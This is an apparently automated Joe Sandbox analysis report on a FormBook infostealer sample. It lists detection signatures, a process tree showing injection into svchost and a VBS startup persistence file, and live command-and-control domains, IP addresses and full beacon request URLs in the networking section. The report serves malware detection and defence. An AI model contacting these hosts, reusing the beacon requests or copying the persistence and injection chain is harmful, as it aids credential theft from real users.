Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
25Lz840Dmh.exe

Overview

General Information

Sample name:25Lz840Dmh.exe
renamed because original name is a hash value
Original sample name:232aba52f171fefbb08cdf88d9fafc571394cf8ec159081d5f9cad2ea2f7669c.exe
Analysis ID:1588079
MD5:6c35b069b37095a1788e5c7b51a60e97
SHA1:3b36ef6c51bb8094729bae419675a2aa21bc6d23
SHA256:232aba52f171fefbb08cdf88d9fafc571394cf8ec159081d5f9cad2ea2f7669c
Tags:exeuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Drops VBS files to the startup folder
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to detect virtual machines (SLDT)
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • 25Lz840Dmh.exe (PID: 720 cmdline: "C:\Users\user\Desktop\25Lz840Dmh.exe" MD5: 6C35B069B37095A1788E5C7B51A60E97)
    • fricandeaus.exe (PID: 4480 cmdline: "C:\Users\user\Desktop\25Lz840Dmh.exe" MD5: 6C35B069B37095A1788E5C7B51A60E97)
      • svchost.exe (PID: 788 cmdline: "C:\Users\user\Desktop\25Lz840Dmh.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
        • LHSqcaLVnKQk.exe (PID: 1280 cmdline: "C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • mobsync.exe (PID: 2384 cmdline: "C:\Windows\SysWOW64\mobsync.exe" MD5: F7114D05B442F103BD2D3E20E78A7AA5)
            • LHSqcaLVnKQk.exe (PID: 7088 cmdline: "C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
            • firefox.exe (PID: 1832 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • wscript.exe (PID: 1240 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fricandeaus.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • fricandeaus.exe (PID: 3284 cmdline: "C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe" MD5: 6C35B069B37095A1788E5C7B51A60E97)
      • svchost.exe (PID: 1660 cmdline: "C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000D.00000002.1903592884.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000009.00000002.1865888843.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000F.00000002.2542862112.0000000004B20000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        0000000F.00000002.2539169522.0000000002EC0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000009.00000002.1866274601.0000000003240000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 4 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            9.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              13.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                13.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                  9.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: WScript or CScript Dropper
                    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fricandeaus.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fricandeaus.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fricandeaus.vbs" , ProcessId: 1240, ProcessName: wscript.exe
                    Sigma detected: Uncommon Svchost Parent Process
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\25Lz840Dmh.exe", CommandLine: "C:\Users\user\Desktop\25Lz840Dmh.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\25Lz840Dmh.exe", ParentImage: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe, ParentProcessId: 4480, ParentProcessName: fricandeaus.exe, ProcessCommandLine: "C:\Users\user\Desktop\25Lz840Dmh.exe", ProcessId: 788, ProcessName: svchost.exe
                    Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fricandeaus.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fricandeaus.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fricandeaus.vbs" , ProcessId: 1240, ProcessName: wscript.exe
                    Sigma detected: Windows Processes Suspicious Parent Directory
                    Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\25Lz840Dmh.exe", CommandLine: "C:\Users\user\Desktop\25Lz840Dmh.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\25Lz840Dmh.exe", ParentImage: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe, ParentProcessId: 4480, ParentProcessName: fricandeaus.exe, ProcessCommandLine: "C:\Users\user\Desktop\25Lz840Dmh.exe", ProcessId: 788, ProcessName: svchost.exe

                    Data Obfuscation

                    barindex
                    Sigma detected: Drops script at startup location
                    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe, ProcessId: 4480, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fricandeaus.vbs

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-10T21:07:05.933875+010028554651A Network Trojan was detected192.168.2.7502553.33.130.19080TCP
                    2025-01-10T21:07:34.215997+010028554651A Network Trojan was detected192.168.2.7502593.33.130.19080TCP
                    2025-01-10T21:07:56.497863+010028554651A Network Trojan was detected192.168.2.7502638.217.17.19280TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-10T21:07:26.470361+010028554641A Network Trojan was detected192.168.2.7502563.33.130.19080TCP
                    2025-01-10T21:07:29.036634+010028554641A Network Trojan was detected192.168.2.7502573.33.130.19080TCP
                    2025-01-10T21:07:31.571060+010028554641A Network Trojan was detected192.168.2.7502583.33.130.19080TCP
                    2025-01-10T21:07:48.290034+010028554641A Network Trojan was detected192.168.2.7502608.217.17.19280TCP
                    2025-01-10T21:07:50.866665+010028554641A Network Trojan was detected192.168.2.7502618.217.17.19280TCP
                    2025-01-10T21:07:53.386866+010028554641A Network Trojan was detected192.168.2.7502628.217.17.19280TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus detection for URL or domain
                    Source: http://www.arcare.partners/0w45/?A2jpdtl=Yh9TKmzRPl60HcuG3Q/P0EhZpxlwA8+XuG0vFhcMASV/W/a+dSJRszrVCE1vryN9WxHHF1ZftQC141Z//Fk6LRAA95+SEq5JDEdJFd3pplmYx68eY/xBqA0qg2DYtg7eqCiJgDt7nHqi&7pG=BhQ41Avira URL Cloud: Label: malware
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeReversingLabs: Detection: 73%
                    Multi AV Scanner detection for submitted file
                    Source: 25Lz840Dmh.exeReversingLabs: Detection: 73%
                    Yara detected FormBook
                    Source: Yara matchFile source: 9.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000D.00000002.1903592884.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.1865888843.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2542862112.0000000004B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2539169522.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.1866274601.0000000003240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.1866670350.0000000004150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2543006411.0000000004B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000002.2542692952.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.2542858222.0000000003120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: 25Lz840Dmh.exeJoe Sandbox ML: detected
                    Source: 25Lz840Dmh.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    Source: Binary string: mobsync.pdbGCTL source: svchost.exe, 00000009.00000003.1833889985.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1834286425.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1834319067.0000000002C31000.00000004.00000020.00020000.00000000.sdmp, LHSqcaLVnKQk.exe, 0000000E.00000002.2540758141.0000000000918000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: LHSqcaLVnKQk.exe, 0000000E.00000002.2539118267.00000000002EE000.00000002.00000001.01000000.00000008.sdmp, LHSqcaLVnKQk.exe, 00000012.00000002.2539220837.00000000002EE000.00000002.00000001.01000000.00000008.sdmp
                    Source: Binary string: wntdll.pdbUGP source: fricandeaus.exe, 00000007.00000003.1312932820.0000000003910000.00000004.00001000.00020000.00000000.sdmp, fricandeaus.exe, 00000007.00000003.1314493954.00000000037C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1754528154.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1866311823.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1752855756.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1866311823.000000000349E000.00000040.00001000.00020000.00000000.sdmp, fricandeaus.exe, 0000000B.00000003.1471204213.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, fricandeaus.exe, 0000000B.00000003.1457026966.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, fricandeaus.exe, 0000000B.00000003.1456050155.0000000003960000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1904206851.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1896489032.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1904206851.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1898737196.0000000003500000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000F.00000003.1868498675.0000000004A24000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000F.00000003.1870865385.0000000004BD5000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000F.00000002.2543297116.0000000004F1E000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 0000000F.00000002.2543297116.0000000004D80000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: fricandeaus.exe, 00000007.00000003.1312932820.0000000003910000.00000004.00001000.00020000.00000000.sdmp, fricandeaus.exe, 00000007.00000003.1314493954.00000000037C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000009.00000003.1754528154.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1866311823.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1752855756.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1866311823.000000000349E000.00000040.00001000.00020000.00000000.sdmp, fricandeaus.exe, 0000000B.00000003.1471204213.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, fricandeaus.exe, 0000000B.00000003.1457026966.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, fricandeaus.exe, 0000000B.00000003.1456050155.0000000003960000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1904206851.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1896489032.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1904206851.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1898737196.0000000003500000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000F.00000003.1868498675.0000000004A24000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000F.00000003.1870865385.0000000004BD5000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000F.00000002.2543297116.0000000004F1E000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 0000000F.00000002.2543297116.0000000004D80000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: mobsync.pdb source: svchost.exe, 00000009.00000003.1833889985.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1834286425.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1834319067.0000000002C31000.00000004.00000020.00020000.00000000.sdmp, LHSqcaLVnKQk.exe, 0000000E.00000002.2540758141.0000000000918000.00000004.00000020.00020000.00000000.sdmp
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C5445A GetFileAttributesW,FindFirstFileW,FindClose,5_2_00C5445A
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C5C6D1 FindFirstFileW,FindClose,5_2_00C5C6D1
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C5C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,5_2_00C5C75C
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C5EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00C5EF95
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C5F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00C5F0F2
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C5F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,5_2_00C5F3F3
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C537EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_00C537EF
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C53B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_00C53B12
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C5BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,5_2_00C5BCBC
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: 7_2_0015445A GetFileAttributesW,FindFirstFileW,FindClose,7_2_0015445A
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: 7_2_0015C6D1 FindFirstFileW,FindClose,7_2_0015C6D1
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: 7_2_0015C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,7_2_0015C75C
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: 7_2_0015EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,7_2_0015EF95
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: 7_2_0015F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,7_2_0015F0F2
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: 7_2_0015F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,7_2_0015F3F3
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: 7_2_001537EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,7_2_001537EF
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: 7_2_00153B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,7_2_00153B12
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: 7_2_0015BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,7_2_0015BCBC

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:50263 -> 8.217.17.192:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50260 -> 8.217.17.192:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50258 -> 3.33.130.190:80
                    Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:50259 -> 3.33.130.190:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50257 -> 3.33.130.190:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50256 -> 3.33.130.190:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50261 -> 8.217.17.192:80
                    Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:50255 -> 3.33.130.190:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50262 -> 8.217.17.192:80
                    Performs DNS queries to domains with low reputation
                    Source: DNS query: www.medicaresbasics.xyz
                    Source: global trafficTCP traffic: 192.168.2.7:50250 -> 162.159.36.2:53
                    Source: Joe Sandbox ViewIP Address: 8.217.17.192 8.217.17.192
                    Source: Joe Sandbox ViewIP Address: 3.33.130.190 3.33.130.190
                    Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
                    Source: Joe Sandbox ViewASN Name: AMAZONEXPANSIONGB AMAZONEXPANSIONGB
                    Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                    Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                    Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                    Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C622EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,5_2_00C622EE
                    Source: global trafficHTTP traffic detected: GET /0w45/?A2jpdtl=Yh9TKmzRPl60HcuG3Q/P0EhZpxlwA8+XuG0vFhcMASV/W/a+dSJRszrVCE1vryN9WxHHF1ZftQC141Z//Fk6LRAA95+SEq5JDEdJFd3pplmYx68eY/xBqA0qg2DYtg7eqCiJgDt7nHqi&7pG=BhQ41 HTTP/1.1Host: www.arcare.partnersAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 505)
                    Source: global trafficHTTP traffic detected: GET /fm31/?A2jpdtl=DuLu/ZJEZ0vsa7NMW6Y1luwMsTpUjTiazxiKsFqMjocJmU+Wz0n+SFDwJrBAW4LzJWLZ00ggtR3FlN9GuppGdr/94mhxusDM5hNFGf0PVpNjy7oFhBMR3vaflGDOrcFhaSuJTiwDMWUm&7pG=BhQ41 HTTP/1.1Host: www.medicaresbasics.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 505)
                    Source: global trafficHTTP traffic detected: GET /ir1u/?A2jpdtl=uYKfOYzDqyqggai79vqScpm8ne5FVijKNd4332x8Wl1jbLzIat8ECGM70iN++AMSU9cBnLmC3wIu2ItfOOX8692jDlyWN1SxZ5RFi5r2IKL+fn6lY/Px6jUTLMjhswDg2fu7McASOoW2&7pG=BhQ41 HTTP/1.1Host: www.meliorahomes.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 505)
                    Source: global trafficDNS traffic detected: DNS query: www.arcare.partners
                    Source: global trafficDNS traffic detected: DNS query: www.medicaresbasics.xyz
                    Source: global trafficDNS traffic detected: DNS query: www.resellnexa.shop
                    Source: global trafficDNS traffic detected: DNS query: www.meliorahomes.net
